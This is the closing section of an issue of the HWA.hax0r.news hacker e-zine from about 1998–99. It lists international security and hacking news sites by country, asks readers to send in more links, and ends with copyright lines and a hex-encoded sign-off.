http://www.fortunecity.com/skyscraper/feature/103/

International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondents and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed

Belgium.......: http://securax.org/cum/ *New address*
Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Croatia.......: http://security.monitor.hr
Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Finland ........http://hackunlimited.com/
Germany ........http://www.alldas.de/
                http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa ...http://www.hackers.co.za
                http://www.hack.co.za
                http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
                and best security related e-zine.

.za (South Africa) sites contributed by wyzwun tnx guy...

Got a link for this section? Email it to hwa@press.usmc.net and I'll
review it and post it here if it merits it.

@HWA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

© 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t }

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-

[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]